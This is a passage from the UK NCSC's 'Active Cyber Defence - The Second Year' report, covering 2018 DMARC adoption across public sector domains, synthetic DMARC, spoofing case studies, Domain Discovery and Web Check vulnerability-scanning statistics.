Late in 2017, Microsoft stopped sending any form of DMARC reports from any of its mailplatforms, enterprise or consumer. Microsoft’s email platforms together form one of the biggestreceivers of email. As a result, this has had a massively negative effect on the community’sability to draw conclusions about email security driven by DMARC adoption and it is almostimpossible for us to compare meaningful statistics from this year with statistics from last year.As an example, last year, we talked about the volume of emails we saw, both in total andthe number of emails failing DMARC. However, it would be unfair to compare those statisticsdirectly to this year’s, due to us not having any data from the one of the world’s biggest emailproviders. We’ll still report what we can stand behind, but any comparisons between numbersrelated to reporting from receivers from last year would be invalid, so we’re not including them.We, and many others, are in discussion with Microsoft about this. This chapter is thereforesomewhat smaller than it could have been. Sorry.

3.2 Last year in Mail Check

Various email anti-spoofing capabilities have been defined over the years, but adoption remainsrelatively slow. Part of the NCSC’s mantra is to eat our own dog food, so we use ‘government asa guinea pig’ in the Active Cyber Defence work to understand any blockers to deployment andto work out ways to fix them for all. Of course, that means pushing for deployment across publicsector email domains. Mail Check monitors public sector domains for SPF, DKIM and DMARCconfigurations. There are also a number of critical national infrastructure related domains inthere so we can understand what email configurations look like across those partners.

Of the 6, 974 domains monitored by Mail Check, 6, 273 are classed as public sector. Thenumber of public sector domains that had DMARC more than tripled from 412 at the end ofDecember 20178 to 1, 369 by the end of December 2018. The number of domains with a DMARCpolicy of p = quarantine or p = reject (i.e. actively preventing suspicious emails being deliveredto recipients’ inboxes) also tripled from 192 to 572.

This is obviously a significant uplift in the public sector adoption of email security protocols,but there remains more to do in driving adoption across public sector to prefer stronger DMARCpolicies, and then encouraging wider industry in the UK (and more widely) to similarly adoptthe protocols.

8Over the course of 2018, we improved our reporting approach to allow for better comparison of figures overtime (and fixed some bugs) hence this number (412) being lower that the number presented in last year’s report(555). Sorry.

34

Page 35: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

3.3 On email providers

DMARC relies on email providers to treat email as requested by the sending domain policy. Forexample, in an ideal world, any emails that fail the authentication requirements (SPF or DKIM)that are received from a sending domain with a DMARC policy of p = reject should never evenreach the intended receiver’s account. It won’t go into their inbox, it won’t go into their spamfolder, it should never be possible for a user to see an email that has failed authentication witha DMARC policy of p = reject.

It turns out that how email providers treat reject records varies, and not all of them completelyreject a reject. If, for example, a rejected email is still allowed into a spam folder, and it turnsout to be a phishing email, the likelihood of the user digging out the mail and actioning it goesfrom zero to greater than zero. Believe it or not, we have a few actual incidents where someoneactioning an email that ended up in their spam folder was the way in9. We need the industry tobe more consistent in how they action a domain’s DMARC policies and there is significant workto be done here.

3.4 Why we stopped collecting forensic reports

In addition to the DMARC aggregate reports which provide statistics about emails received,and how they are processed, the DMARC standard defines ‘Failure Reports’, also known as‘Forensic Reports’. These reports are intended to show domain owners what the email thatfailed authentication (and so was potentially spoofed) looked like by including a copy of the fullemail. In order to address privacy concerns, particularly around reporting of legitimate emailsdue to misconfiguration, the standards allow for redaction in the reports. The level of redactionis left to email service providers to decide on, and has always varied. In our experience, thishas ranged from some providers who include only partial header information, through to someproviding weakly redacted complete emails along with attachments.

In the first half of 2018 we noticed a drop off in the failure reporting received by our MailCheck tool, and so investigated what we were currently receiving. The results showed a dramaticdrop in the volume of failure reports, and increased redaction, reducing the usefulness of whatwe were getting. The majority of reports were coming from a non-email service provider, webelieve because of an odd email loop. Of the remainder, all reports included only headers, andwere received from a set of foreign receivers that were not representative of the UK email marketwe’d expect Mail Check users to be interacting with. After some research and consultation, itappears that amongst other things, concerns about the privacy impact of even redacted emailsalongside the introduction of GDPR have put a real dampener on failure reporting. Given thevery limited, non-representative data we’ve been receiving, along with the potential to be dealingwith very sensitive private data in uncommon edge cases, we’ve stopped collecting and processingDMARC failure reports. We have told Mail Check users to no longer add the failure reportingaddress to their DMARC record and to remove it when convenient.

We continue to be interested in DMARC failure reports, and other opportunities for auto-mated information sharing to both improve configuration and identify and mitigate attacks. We’llcontinue to consult with the email security community and Mail Check users about opportunitiesin this area.

9To be completely clear, finding an interestingly-titled email in their spam folder, trying to open the attachedExcel spreadsheet, failing, moving the message back to the inbox, opening the Excel spreadsheet for real andclicking through not one, not two, but three different security warnings. So, we’d like p = reject to meanp = reject. We get there’s a balance though.

35

Page 36: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

3.5 Abuse of public sector email domains

3.5.1 Spooftastic data

This is where we’d normally report a huge swathe of really interesting data about how the UKpublic sector’s email domains have been abused over the last year. Unfortunately, due to theMicrosoft decision in 2017, the data wouldn’t be consistent with last year. No matter how manydisclaimers we put in this paper, someone would compare the numbers we could publish thisyear with the ones we published last year and make claims that just wouldn’t be substantiatedby the biased data we have. Rather than continue to explain why that’s not good science, we’vedecided not to publish the macro-level data. Instead, we’ve drawn some other conclusions thatwill hopefully be as interesting and lead to other avenues of research. For those cynics amongyou, this isn’t some excuse because the data suggests things have got worse. That’s not the case- we’re doing this for the right reasons.

3.5.2 Case study: Campaign using real domain

Criminals aren’t always consistent in how they use spoofed brands or the care they take intargeting specific campaigns. Here, we show an example of a non-departmental public bodywhose email domain is hardly spoofed at all during the year, followed by a massive spike inDecember. Figure 17 shows the volume of spoofed messages across the year. You’ll note thereare no reported dispositions of reject at all across the year.

It’s interesting to look at the reporters of these spoofed messages. The top reporter ofdisposition quarantine mail (remember, we had no reject disposition in this campaign) was theRussian email provider mail.ru with over two million reports (2, 125, 701 to be exact). The nexttwo most prolific reporters were Google with 1, 430 reports and Yahoo! with 327. This couldshow a certain lack of targeting from the criminal behind this campaign. We can’t say that itwas totally incorrectly targeted as we get no reports from Microsoft, one of the bigger providersof email services to UK citizens, but given the numbers from Google and Yahoo!, it’s pretty likelythis was a criminal targeting Russian citizens using a slightly obscure UK public sector body asthe lure. This does seem to suggest that not all criminals are omnipotent evil geniuses.

3.6 Synthetic DMARC

An email apparently from the government looks much more legitimate if it comes from agov.uk domain such as taxrefund.gov.uk than from a domain not linked to the governmentlike taxrefund.gov.uk.hmrc.secure.clearlyshady.net. Attackers have traditionally exploited thistrust imbalance to make their phishing emails look more legitimate. Last year, we talked aboutsome initial work on ‘synthetic DMARC’, that is synthesising DMARC and related DNS recordsfor non-existent subdomains. We have since done some more work on the technique and in Julywe moved the policy to p = reject without causing any damage. Be clear though: this remainsan evil hacky kludge and we need a better way to express policy ownership in domain hierarchies.gov.uk is an example of something called a ‘Public Suffix Domain’, as we talked about in thelast report. Since then the IETF DMARC Working Group has started to discuss the variousissues and begin to write RFCs that could help solve this problem. We welcome this work andwill support it as it will help governments and other owners of Public Suffix Domains betterimplement DMARC policies and make criminals’ lives harder. As new generic top level domainslike .bank come online at scale, this will be even more important.

Table 11 and figure 18 show the volume of DMARC aggregate reports sent as a result ofsynthetic DMARC records.

36

Page 37: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

200,000

400,000

600,000

800,000

1,000,000

1,200,000

1,400,000

1,600,000

1,800,000

2,000,000

2,200,000

Month (2018)

Vol

um

eof

spoofe

dem

ail

Quarantine None

Figure 17: Volume of spoofed email using one particular public sector domain

3.6.1 Case study: Spoofing the aviation sector

Figure 19 shows the number of emails blocked each day by synthetic DMARC records over fourmonths in 2018. In total, 429, 908 emails were blocked over this period, but around 15% of thisnumber were blocked on one day, 8 August.

This large spike in emails blocked by Synthetic DMARC was due almost entirely to one par-ticular email spoofing campaign. The emails appeared to come from a gov.uk domain purportingto belong to an organisation in the aviation sector. No such gov.uk domain is registered - andthe entity involved wouldn’t qualify for a subdomain under gov.uk - so we knew the emails weresuspicious. Figure 20 shows that the campaign began with a very high number of emails whichdropped to a low level within a few days.

Once this was detected, we looked across our services to see where this domain had beendetected. The takedown service identified the domain in use in emails purporting advance feefraud in its spam feed. The email host of the account was notified that it was being used infraudulent activity, and it was taken down. This shows how useful the sharing of data betweenservices can be, and it’s something we’re aiming to develop and expand in 2019 as the Threat-

37

Page 38: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Month (2018) Total Reports ReceivedJuly 5,764

August 274,532September 127,901October 17,553

November 17,191December 105,078

Table 11: Volume of synthetic DMARC reports

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

50,000

100,000

150,000

200,000

250,000

Month (2018)

No

ofsy

nth

etic

DM

AR

Cre

port

sre

ceiv

ed

Figure 18: Volume of synthetic DMARC reports received

o-matic10 moves towards production status.

3.6.2 Case study: Merger of two public bodies

In 2016, two fire services merged to form a new super service with a new name and associatedinternet domain. One of the constituent organisations subsequently deregistered their originaldomain. Between July and September 2018, Synthetic DMARC blocked more than 150,000emails from this now non-existent domain. We can’t be 100% sure whether these were as a

10OK, Streaming Event Platform

38

Page 39: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Aug-1

8

Sep

-18

Oct

-18

Nov

-18

0

10,000

20,000

30,000

40,000

50,000

60,000

Vol

um

eof

spoofe

dm

ail

Figure 19: Volume of email blocked by synthetic DMARC records

result of fraudulent purposes or misconfiguration, but it’s an interesting artefact that shows thenecessity to correctly curate domains throughout their lifecycle.

3.6.3 Investigating failing mail

One of the things we’ve looked for is email that could be legitimate, but is failing DMARC tests,ignoring the final disposition of the mail. We further filter to include only those entries wherethe reverse DNS of the sending IP was not NXDOMAIN and was not contained in the gov.uktop level domain (TLD). We seem to find three different classes of email like this :

1. Things that are clearly malicious. The aviation sector example is one where the domaindoesn’t exist, but there are others like mail from bedfordhire.gov.uk (note the misspelling)being sent from a domestic broadband connection in China.

2. Things that are clearly misconfigurations. For example, many public sector bodies still usethe MessageLabs service, but many seem not to have included that infrastructure in theirSPF records.

3. All the other weird stuff.

The weird stuff is exactly that - weird - and in the vast majority of cases each instance relatesto a tiny number of email messages. Some of it could be legitimate uses of niche services, or

39

Page 40: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

07-A

ug-1

8

11-A

ug-1

8

15-A

ug-1

8

19-A

ug-1

8

23-A

ug-1

8

27-A

ug-1

8

31-A

ug-1

8

04-S

ep-1

8

0

10,000

20,000

30,000

40,000

50,000

60,000

Vol

um

eof

spoofe

dm

ail

Figure 20: Volume of emails related to aviation related campaign

test infrastructure that departments are experimenting with. Some of it could be really targetedmalicious use of the domain. Without a lot more investigation, it’s really difficult to tell. We’rehoping that some of the results alluded to in section 3.9 will give us tools to cut down to reallyinteresting cases more quickly.

3.6.4 Spoofing from non-UK IP addresses

At least 49% of emails blocked by Synthetic DMARC between 10 July and 7 November 2018came from IP addresses that reverse DNS showed were associated with non-UK country codetop-level domains (ccTLDs). This proportion does not include non-geographic top-level domainssuch as .com and .net. Emails were blocked from 69 different ccTLDs. Given the research resultsin section 3.9, we’re not actually sure what this tells us. More work is needed in this area.

3.6.5 Synthetic DMARC not universal

As mentioned previously, our synthetic DMARC idea is an evil kludge. In table 12 we show thetotal number of DMARC reports received from the top 5 providers and in table 13 the totalnumber of synthetic DMARC reports received in one month. If we assume that spoofed emailis broadly uniformly distributed across receivers, we would expect the top five reporters of bothreal and synthetic DMARC reports to be broadly the same, which they are not. Therefore, wecan infer that not all receivers of email correctly process Synthetic DMARC records. While wecan only guess at why (perhaps they early fail delivery when the from address is NXDOMAIN)this gives more weight to the current work in IETF DMARC working group on handling Public

40

Page 41: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Reporter Total Reportsgoogle.com 61,363,605Yahoo! Inc. 18,876,201

Mail.Ru 699,554sercoglobal.com 227,587AMAZON-SES 178,262

Table 12: Top five DMARC reporters in January 2019

Reporter Total Reportsgoogle.com 23,745Yahoo! Inc. 1,060

emailsrvr.com 64dev.johnlewis.co.uk 37

bridgend.gov.uk 30

Table 13: Top five Synthetic DMARC reporters in January 2019

Suffix Domains in a more standardised way.

3.7 The journey to reject

For any enterprise of a decent size, implementing DMARC is often a long process. An organisationusually starts the process by implementing a policy of p = none. This will not affect how themail is handled, but the reports will let the organisation see which mail would pass DMARCchecks and which would fail. This helps an organisation better understand the reality of theirmail infrastructure before making anything service-affecting. Next is p = quarantine, wherethe DMARC policy tells the receiver to ‘quarantine’ any mail that doesn’t pass the checks andthis normally results in mail going into the user’s spam folder. Finally, organisations move to apolicy of p = reject, which mostly (but not always) sees the spoofed mail never even reachingthe intended recipient.

If the underlying understanding of the mail infrastructure isn’t complete, implementingDMARC can cause non-delivery of real mail. That’s bad, so the process of turning on themore stringent policies should be done carefully. Factor in expertise and resources, and you canend up with a wide distribution of how long a domain takes to get to p = reject. This is despitesome organisations trying to force people to get their DMARC records to p = reject in 90 days.

Figure 21 shows a histogram of the time taken for domains joining Mail Check to get to apolicy of p = reject. Some domains started sending their reports to Mail Check with p = rejectalready implemented, which we exclude from this. The longest it took any organisation to reachp = reject was 542 days.

As we’ve said, DMARC needs to be implemented carefully. There may be extenuating cir-cumstances that lead to some of the really long implementation times, but in general we’d liketo speed up the implementation timeline and will be looking at what else we can do to supportorganisations on this journey. As we de-risk and optimise DMARC adoption using public sectoras a proving ground, we’ll publish the learnings and tooling we create in order to help otherswith their implementation.

41

Page 42: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

0 100 200 300 400 500 6000

10

20

30

40

50

Time to reach p=reject in days

No

ofd

omain

s

Figure 21: Histogram of time for domains to get to p = reject (bin width=7 days, xmax = 550).

3.8 Is there a link between DMARC and phishing?

Implementing DMARC should make it harder for criminals to spoof high-trust domains as partof their phishing campaigns. This should disincentivise a set of criminals from using gov.uk asa brand lure for their campaigns because the lures are less attractive to potential victims. Wenote that we’ve seen very few deceptive domains11 related to gov.uk in 2018, and so any changein posture is likely to be reflected in spoofing. So, it would be informative to consider the effectof DMARC on public sector domains with p = quarantine or p = reject policies (i.e. thosethat are likely to cause a potential victim to not see a message) and the volume of public sectorrelated phishing entities that we have taken down over same period. Figure 22 shows these data.

By observation, it appears that higher DMARC adoption across a set of brands is (weakly)negatively correlated with the volume of takedowns impersonating those brands. We haven’tlooked at the specific adoption of DMARC by individual sub-brands of HMG and the effect onphishing yet, but should do so. However, we’re prioritising the adoption of DMARC and theTakedown Service across the same set of high-trust, value-bearing brands, so the populationsshould be broadly similar. The trend line is pretty noisy, but seems to be broadly downward,apart from the large spike in September which is explained in section 2.3.1. However, there aremany variables we could control and correct for in this, including our own work on proactivetakedowns for the same brands. So, we absolutely cannot say that the link is causal (i.e. moreDMARC means less phishing) but we can suggest that the combination of measures seems to behaving a protective effect. We’ll try to do some more detailed analysis next year.

3.9 Other research

We’ve partnered with the Alan Turing Institute, the UK’s national institute for data science andartificial intelligence, allowing them access to our Mail Check data to drive innovative research inthis area. The initial work intends to test a number of simple heuristic and clustering approaches

11Recall from last year’s report, a deceptive domain is constructed specifically to try to fool a user into believingit’s a real domain. An example would be taxrefund.secure.hmrc.gov.uk.cf .

42

Page 43: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan-1

8

Feb

-18

Mar-

18

Apr-

18

May

-18

Jun-1

8

Jul-

18

Aug-1

8

Sep

-18

Oct

-18

Nov

-18

Dec

-18

0

100

200

300

400

500

Nu

mb

erof

dom

ain

sor

take

dow

ns DMARC adoption

Phishing takedowns

Figure 22: Relationship between DMARC adoption and phishing attacks for public sector

on DMARC aggregate data to discover likely misconfigurations and malicious activity. Theinitial work has shown some simple heuristics are relatively powerful in the administration andunderstanding of DMARC at large scale. We have also discovered some very interesting featuresof the gov.uk email estate. The full findings of the work are too long to be included in totalityhere, but we provide some example findings.

For example, across all the aggregate reports received by the Mail Check platform, mail hasbeen sent from some 4.9 million IP addresses. Table 14 shows a ranked table of the volume ofemail sent by each IP address over the two years of data collected by Mail Check. ‘Rank’ is theIP’s rank by volume sent and ‘passing’ has the definition in the DMARC standard - i.e. eitherthe SPF or DKIM tests pass.

It is interesting that over 90% of all email from gov.uk subdomains12 is sent from 5000 IPaddresses and that the 5000th most voluminous sender of email sent less than 7000 emails overthose two years. This implies a very long tail to account for the 4.9 million sending IPs in theMail Check data set and also suggests that the problem of discovering misconfiguration andmalicious activity across the gov.uk sending estate should be split into two distinct problems- that of the relatively small number of high volume senders and that of the relatively largenumber of low volume senders.

For an initial clustering of high volume senders, the researchers took the top 10,000 sendingIP addresses (by volume) and built a feature vector containing both IP address related featuresand domain related features. These were built into a sparse matrix and their dimensionalityreduced to 100 dimensions using truncated singular value decomposition (truncated SVD). Theresulting features were clustered using density-based spatial clustering of applications with noise(DBSCAN), requiring at least three neighbours for clustering. The resulting clusters are visu-alised using t-Distance stochastic neighbour embedding (t-SNE) and shown in figure 23. Dueto the large number of clusters, colours are difficult to distinguish, but clusters of similar colourthat are not spatially proximate are independent on this visualisation. The figure shows 273

12Specifically, those gov.uk subdomains that report to Mail Check or for which Synthetic DMARC records

are generated.

43

Page 44: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Rank % all emails sent % all passing emails % all failing emails No. of sent mails(cumulative) (cumulative) (cumulative) (this IP)

1 7.53% 8.78% 5.45% 82,656,6645 24.83% 31.50% 13.71% 21,795,746

10 32.46% 43.60% 13.87% 8,559,22050 45.51% 57.53% 25.47% 3,007,656

100 55.94% 63.54% 43.27% 1,895,731500 77.85% 86.05% 64.17% 183,026

1,000 83.37% 91.74% 69.41% 71,2852,000 87.00% 95.59% 72.68% 22,6285,000 90.29% 98.48% 76.64% 6,865

10,000 92.14% 99.22% 80.34% 2,57620,000 93.57% 99.50% 83.68% 1,00850,000 95.14% 99.78% 87.40% 340100,000 96.16% 99.86% 89.98% 155

Table 14: Distribution of IP addresses sending email and their disposition

distinct clusters with unclustered points in grey. One of the interesting results of this work isthat a ‘super component’ exists that links otherwise unrelated clusters and this contains 1879disctinct IP addresses. There are a further 4 clusters each containing 512 addresses. Manualinspection shows these to be common infrastructure, including large cloud providers. This simpleresult hints at the potential benefit of structured analysis of DMARC aggregate reporting fordiscovering both misconfiguration and malicious abuse of a domain.

This research should lead to new ways of automatically analysing DMARC aggregate reportsto alert domain owners to misconfigurations or spoof messages using their domain.

3.10 Conclusion

Adopting DMARC at scale is one the key planks for the NCSC’s ACD programme. Despite beingunable to publish comparative data for the year 2018 (due to Microsoft’s change in policy), webelieve that adoption of DMARC at scale is a key capability to degrade criminals’ attempts toabuse trusted brands. However, there remain some issues that need to be resolved :

• A centralised processing platform and experienced people who understand what reportsimply is a significant benefit to adoption.

• Expert, structured analysis of the aggregate data looks like a promising avenue of sustainedresearch.

• Misconfigurations remain an issue.

• Criminal modus operandi evolves as protections are put in place, making curating emailsecurity, including DMARC, a long-term effort for any organisation.

• Implementing DMARC at scale at the Public Suffix Domain level is currently fraught. Thismakes the IETF DMARC Working Group efforts in this area even more important if weare to encourage more widespread adoption of DMARC.

• Receivers are weird. It would be nice if they could be both self-consistent and consistentacross the community.

44

Page 45: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Figure 23: t-SNE visualisation of clustering of high volume IP address features

45

Page 46: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

We believe that we’ve shown that DMARC adoption and the resulting action from the reportsgenerated is worth the effort. We strongly encourage all UK businesses that have high-trustbrands with the UK population to adopt DMARC to remove one avenue for criminals to monetizetheir brands. We also strongly encourage other governments to begin to centrally curate theirown domains. It is only through widespread adoption of better email security that we will havea sustained impact on criminal return on investment and their intent to attack citizens.

Internal to NCSC, we have a league table of progress of adoption of DMARC. We may seekto publish this, and one which does the same for certain industry sectors, over the coming year.After all, all the data necessary to build such tables are in the public domain.

46

Page 47: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

4 Domain Discovery

Last year, we described Domain Discovery, a service that is intended to help an organisationunderstand the totality of its internet domain footprint. Then, we said that the service was inprivate alpha. It’s now slowly being turned into a real service with a minimum viable product(MVP) to be delivered in Spring 201913.

The MVP uses data from a commercial Whois service, that provides details of domain regis-trations, although these are often inconsistently populated and incomplete, particularly for thekinds of small public sector organisations that could most benefit from the Domain Discoveryservice. So the Whois data is combined with the output from a new algorithm from the AlanTuring Institute that attempts to find possibly-owned domains for an organisation by followingall hyperlinks throughout the organisation’s website, intelligently analysing the content of thedestination websites using state-of-the-art topic models, and then continuing to follow links fromthose new sites. This can be done at scale using open-source web crawl data from the Common-Crawl project14. The results so far are promising but more work is needed to tune the algorithm,and to tidy up and expand the results.

The Domain Discovery service intends to help organisations tackle the various hard partsof having domains on the internet (that is discovery, verification of ownership and danglingDNS). As mentioned, the service is not yet fully functional and so providing a detailed summaryof the output isn’t yet possible. However, we can illustrate by looking at the results fromncsc.gov.uk. Commercial and third party tools like Hardenize, DNSDumpster and Sublist3r tellus that there are over 100 subdomains of ncsc.gov.uk. Domain Discovery currently presents afurther 125 ‘domains of interest’, that is not subdomains, but sites that look like they might beowned by NCSC, such as govcertuk.gov.uk and even gchq.gov.uk. Some of the results are rathertenuous but are presented to the user in a way to make that obvious, using High, Medium andLow confidence bands, and a description of what the confidence bands mean. We’re currentlyevaluating the results with a select group of customers (mostly local government organisations)in order to gather feedback on the usefulness of the service, and what additional data, analyticsand filtering rules we might want to include.

The next phase of development, scheduled for the second half of 2019, will likely expandthe service’s data sources to include more commercial services, more NCSC-produced data, andmore public data like DNS records and certificate transparency logs. We also want to rebuild theAPI set to make the whole thing integrate better with the wider Active Cyber Defence serviceportfolio.

On a related note, to encourage new research ideas in this space, we posed the wider challengeof automatically capturing the purpose of websites to the academic community through a ‘DataStudy Group’ run by the Alan Turing Institute in December 2018. A number of ideas weretried, especially for combining clues from hyperlinks and content in smart ways, and the reportis available on the institute’s website here15.

13Remember, this paper covers the calendar year 2018!14http://commoncrawl.org15https://www.turing.ac.uk/collaborate-turing/data-study-groups

47

Page 48: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

5 Web Check

Web Check is a service for public sector organisations to check and maintain the security of theirweb infrastructure. It scans their websites for the most common vulnerabilities and the results ofthe scan are then presented to them in the Web Check tool, alongside advice on how to mitigateany vulnerabilities. Web Check is mainly about getting public sector organisations used to beingproactively scanned and fixing issues as we move to a ‘scan by default’ posture for anything witha gov.uk name.

5.1 Last year in Web Check

Web Check’s ‘advisories’ are presented to the user as a narrative on their website’s security,including ways to improve. Each ‘advisory’ groups together a number of ‘issues’. In Table 15,we present the number of advisories issued, alongside the number of unique URLs scanned andthe number of individual checks on websites. Advisories presented to users have different levelsof severity, from ‘informational’, through ‘advisory’ to the most serious, ‘urgent’16. For somespecific areas, we also issue ‘positive’ advisories, meaning that whatever has been tested is well-configured and meets our standards. This is the result of some early user research that showedus that just shouting at people when they get things wrong isn’t helpful. Knowing you’re doinga decent job - and sometimes being able to tell your boss that - builds confidence so that you’remore likely to act sensibly when something does need attention.

Measure 2017 2018Unique URLs scanned 7,791 30,813Individual checks run 7,181,464 633,991,247Total advisories issued 29,496 111,853

‘Advisory’ and ‘urgent’ advisories issued 4,108 43,510

Table 15: Web Check comparison in numbers - 2017 and 2018

The total number of unique URLs scanned in 2018 has more than tripled in comparison to2017. Given each URL is added by a user, this shows the growth of the user base of Web Check.The number of individual checks run has increased almost a hundredfold, and we issued a totalof 111,853 advisories direct to users in 2018.

5.2 What does Web Check look for?

For reference, we reproduce Web Check’s capabilities from last year’s paper here, and detail theadditional checks added in 2018: ASP.NET, Consistency, Cross-Orgin, XML-RPC and a newDNS check.

• CMS

– Attempts to determine if a content management system being used to serve the websiteand checks its version.

– Supports Drupal, Jadu, Joomla, Umbraco, and WordPress.

– Reports whether the CMS is no longer supported, supported but not on the currentmajor version, or on the current major but not minor version.

16Yes, ‘advisory advisory’ is a poor name, but it’s too late now.

48

Page 49: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

– Fetches the URL, parses as HTML, and checks a small number of well-known pathsif necessary.

• Domain

– Checks whether the URL contains a domain reserved for use by the public sector (e.g.foo.gov.uk, foo.ac.uk, not foo.co.uk, foo.com).

– Checks for ‘dangling DNS’ scenarios.

– Only uses DNS.

• HTTP

– Checks whether the website redirects from a reserved domain to a public domain (e.g.foo.gov.uk to foo.com).

– Checks whether the website redirects from HTTPS to HTTP.

– Checks whether the website returns a valid HTTP status code.

– Checks for HTTP/2 support.

– Makes a small number of HTTP requests.

• Server Version

– Attempts to determine the server software being used to serve the website and checksits version.

– Supports Apache, Nginx, PHP and OpenSSL.

– Reports whether the server is no longer supported.

– Fetches the URL and inspects the ‘Server’ and ‘X-Powered-By’ headers.

• TLS

– Checks whether SSL/TLS is supported and performs a full SSL/TLS vulnerabilityassessment.

– Supports SSLv2, SSLv3, TLSv1.0, TLSv1.1, TLSv1.2, TLSv1.3.

– Identifies all known SSL/TLS vulnerabilities that we can test for non-intrusively.

– Connects to the host over SSL/TLS a medium number of times to assess vulnerabilities(around 30).

• X.509

– Checks the websites certificate chains for issues (including expiry).

– Checks all certificate chains for issues, such as too many or too few certificates beingsent by the server, whether the domain matches etc.

– Checks for any certificates blacklisted by browsers (e.g. Symantec, DigiNotar).

– Connects to the host over TLS three times to fetch each certificate type.

• WannaCry

– Checks for artefacts of the WannaCry infection in the server.

– Checks whether ports 137, 138, 139, 445, or 3389 are open for TCP or UDP.

49

Page 50: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

• Third Party

– Checks for third party resources being used in the application (such as externallyloaded javascript) which are loaded over HTTP.

• ASP.NET

– Checks for ASP.NET applications with remote debugging or tracing enabled.

• Consistency

– Checks the site serves the same content over HTTP and HTTPS.

– Checks for redirection to different pages over HTTP and HTTPS.

• Cross-Origin

– Checks for overly-permissive cross-origin policies.

• XML-RPC

– Checks for unsecured XML Remote Procedure Call functionality in content manage-ment systems.

Table 16 shows the urgent and advisory advisories from 2017 and 2018. These are the most

serious security issues which we encourage users to fix.

Type 2017 2018TLS 1,629 18,496

X.509 2,178 11,179Consistency New for 2018 4,994

Server Version 76 3,216CMS 184 2,148

XML-RPC New for 2018 1,729ASP.NET New for 2018 612

Cross-Origin New for 2018 5493rd Party New for 2018 476WannaCry 36 104

Domain 0 6HTTP 1 1

WordPress 4 0 - merged with CMS pluginTotal 4,108 43,510

Table 16: Web Check advisories - 2017 and 2018

The new-for-2018 plugins produced a total of 8,360 urgent and advisory advisories, comparedto 35,150 urgent and advisory advisories produced from plugins created in 2017. There is clearlystill value in the older plugins since they are still issuing urgent and advisory findings, indicatingthat security of internet-facing properties is a continuous job and one cannot just deploy andforget. Who knew?17

In 2018, the biggest absolute increases as seen in Table 16 are the TLS scans, the X.509 scansand the Server Versions. By percentage increase, it’s Server Version, CMS and then TLS. In

17For non-UK readers, this is sarcasm.

50

Page 51: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

section 5.4 we discuss a trend that we observe in X.509 certificates. As we get more and moreconsistent data in other areas, we will be able to gain more insight into the trends in the othervulnerabilities and be able to target them more effectively.

5.3 Getting issues fixed

5.3.1 Time to fix

One advisory issued to a user is often made up of multiple issues discovered when the pluginsscan a website. For example, there could be multiple TLS configuration issues grouped togetherinto a single TLS configuration advisory, and only by fixing each one of these individual issueswill the advisory resolve. So, it’s actually more interesting to look at how many individual issuesare fixed, rather than just advisories.

The time to fix individual issues which are grouped into ‘urgent’ and ‘advisory’ advisories in2018 is presented in Figure 24.

1

25

50

75

100

125

150

175

200

225

250

0

20,000

40,000

60,000

80,000

Time to fix (days)

Nu

mb

erof

urg

ent

an

dad

vis

ory

issu

es

Figure 24: Histogram of time to fix urgent and advisory issues (250 bins, xmax = 365)

Figure 24 shows that the issues reported by Web Check can take anywhere from a dayto resolve, to a month or even longer. We are mostly interested in the long-running issuesand understanding any blockers to remediation that the site owners may face. We will beconcentrating on this, and how to improve time to fix, in 2019.

5.3.2 How bad is it all?

Figure 25 shows the number of issues fixed over the year, split by severity.This shows the number of issues fixed has risen throughout 2018, driven by a constant on-

boarding of new users and new tests created by the team. The spike in June was not the result

51

Page 52: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan

Feb

Mar

Apr

May

Jun

Jul

Aug

Sep

Oct

Nov

Dec

0

10,000

20,000

30,000

40,000

Month (2018)

Nu

mb

erof

issu

es

UrgentAdvisory

Informational

Figure 25: Number of issues fixed in 2018, grouped by severity

